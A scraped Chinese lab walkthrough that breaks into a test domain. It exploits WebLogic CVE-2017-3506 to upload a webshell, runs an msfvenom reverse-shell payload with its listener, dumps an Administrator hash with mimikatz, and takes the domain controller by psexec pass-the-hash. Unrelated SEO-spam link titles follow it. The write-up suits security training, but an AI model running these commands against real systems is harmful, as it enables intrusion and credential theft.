当前位置: 首页 > news >正文

绍兴网站建设技术外包如何快速做h5网站

绍兴网站建设技术外包,如何快速做h5网站,宁波网站建,社区网站源码环境配置 链接:百度网盘 请输入提取码 提取码:wmsi 攻击机:kali2022.03 web 192.168.111.80 10.10.10.80 自定义网卡8,自定义网卡18 PC 192.168.111.201 10.10.10.201 自定义网卡8,自定义网卡18 DC 192.168.52.1…

环境配置

链接:百度网盘 请输入提取码

提取码:wmsi

攻击机:kali2022.03

web 192.168.111.80 10.10.10.80 自定义网卡8,自定义网卡18

PC 192.168.111.201 10.10.10.201 自定义网卡8,自定义网卡18

DC 192.168.52.141 自定义网卡18

所有靶机密码为:1qaz@WSX

登录web de1ay 修改密码为Admin@123,

再切换用户mssql登录进行后,手动开启weblogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

web渗透

1.扫描靶机开放端口和相应服务情况

nmap -p- -A -sV 192.168.111.80

2.进行下载weblogicscan配置requests时报的错

3.进行扫描成功探测到CVE-2017-3506

4.下载利用工具

git clone GitHub - ianxtianxt/CVE-2017-3506: CVE-2017-3506

5.java -jar WebLogic-XMLDecoder.jar //查看利用方法

java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.80:7001/ //探测是否存在漏洞

java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp //上传木马

6.访问网址成功命令执行

http://192.168.111.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami

7.本地配置http代理,进行抓包

8.执行命令,成功抓到。

proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp

9.生成哥斯拉木马

10.查看木马,并复制去替换他命令执行的代码

11.成功替换

12.成功上线哥斯拉

13.msfvenom生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=5555 -f exe -o shell.exe

14.上传文件到哥斯拉

15.msf开启监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.111.129

set LPORT 5555

run

内网渗透

1.getsystem提权到管理员权限

2.ipconfig /all查看本机ip,所在域

3.信息收集

net user /domain //查看域用户

net group "domain admins" /domain //查看域管理员

net group "domain controllers" /domain //查看域控制器

net group "domain computers" /domain //查看域中的其他主机名

4.ping DC 拿到其ip地址

run autoroute -s 10.10.10.0/24 //添加路由

5.加载猕猴桃,拿到administrator的hash

Administrator

161cff084477fe596a5db81874498a24

6.配置代理

use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

set srvport 8989

run

7.直接用impacket包里的psexec.py进行攻击,成功拿下域控

proxychains psexec.py -hashes :161cff084477fe596a5db81874498a24 ./administrator@10.10.10.10

http://www.yayakq.cn/news/760888/

相关文章:

  • 文档下载网站 建设点餐小程序开发需要多少钱
  • 常州网络公司中环互联网网站建设网站推广软件哪家好
  • 网站前端凡科商城小程序怎么样
  • 龙华网站建设推广平台网站建设论文的摘要
  • 如何通过c语言来做网站昆山智能网站建设
  • php网站超市上海网站设计开发公司
  • 女人做春梦视频网站专业的建设网站
  • 平台后期维护东莞seo网站推广
  • app开发模板网站嵌入式培训出来能找到工作吗
  • 新公司 做网站 流程足球网站怎么做
  • 网站加载慢图片做延时加载有用wordpress 设置 多媒体 文件上传
  • 世界上网站做的好的例子社区电商app定制开发多少钱
  • 施工企业的施工现场消防安全责任人应是抖音seo搜索优化
  • 网站运营与推广苏州做网站优化哪家好
  • 大连辰熙大厦做网站无线网被附近多个
  • 网站屏幕自适应公司注册资金最低多少钱
  • 首页有动效的网站自建网站平台要多少钱
  • 网站关键词如何做优化wordpress优化图片分离
  • 网站建设为什么这么贵做网站是怎么回事
  • 重庆建网站搜索快忻科技网站搜索下拉是怎么做的
  • 私人做的不错的网站站长网站素材
  • 如何查网站建设者ip广东省建设局官方网站
  • 百度公司网站seo方案优设网官网首页
  • 自建外贸网站大连网站建设工作室
  • 安溪网站开发中学生网站设计下载
  • 网站改版 新闻太原谁家网站做的好
  • 玉环做网站找那家公司视听节目 网站建设
  • 确定网站文案一般网站建设公司有多少客户啊
  • 百度入口网站网站数据库制作
  • 南宁公司的网站建设网站登录注册怎么做